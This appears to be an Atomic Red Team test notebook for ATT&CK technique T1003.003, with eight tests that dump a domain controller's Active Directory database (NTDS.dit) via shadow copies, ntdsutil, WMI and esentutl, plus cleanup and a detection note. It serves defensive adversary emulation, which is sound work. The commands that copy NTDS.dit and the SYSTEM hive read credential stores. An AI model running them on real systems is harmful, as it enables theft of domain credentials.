# T1003.003 - NTDS
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy


## Atomic Tests

### Atomic Test #1 - Create Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Target must be a Domain Controller

##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually

```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
vssadmin.exe create shadow /for=C:
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 1

### Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Target must be a Domain Controller

##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually

```
##### Description: Volume shadow copy must exist

##### Check Prereq Commands:
```cmd
if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1)

```
##### Get Prereq Commands:
```cmd
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement

```
##### Description: Extract path must exist

##### Check Prereq Commands:
```cmd
if not exist C:\Windows\Temp (exit /b 1)

```
##### Get Prereq Commands:
```cmd
mkdir C:\Windows\Temp

```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 2

#### Cleanup: 
```cmd
del "C:\Windows\Temp\ntds.dit"        >nul 2> nul
del "C:\Windows\Temp\VSC_SYSTEM_HIVE" >nul 2> nul
del "C:\Windows\Temp\SYSTEM_HIVE"     >nul 2> nul
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.

Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Target must be a Domain Controller

##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually

```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
mkdir C:\Windows\Temp\ntds_T1003
ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_T1003" q q
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 3

#### Cleanup: 
```cmd
rmdir /q /s C:\Windows\Temp\ntds_T1003 >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Create Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Target must be a Domain Controller

##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually

```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic shadowcopy call create Volume=C:\
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 4

### Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin

##### Check Prereq Commands:
```cmd
wmic /node:"localhost" shadowcopy list brief

```
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)

```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic /node:"localhost" shadowcopy call create Volume=C:\
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 5

### Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin

##### Check Prereq Commands:
```cmd
wmic /node:"localhost" shadowcopy list brief

```
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)

```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic /node:"localhost" process call create "cmd.exe /c esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\ntds.dit"
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 6

### Atomic Test #7 - Create Volume Shadow Copy with PowershellThis test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 7

### Atomic Test #8 - Create Symlink to Volume Shadow CopyThis test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
vssadmin.exe create shadow /for=C:
mklink /D C:\Temp\vssstore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
```

In [ ]:
Invoke-AtomicTest T1003.003 -TestNumbers 8

## Detection
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.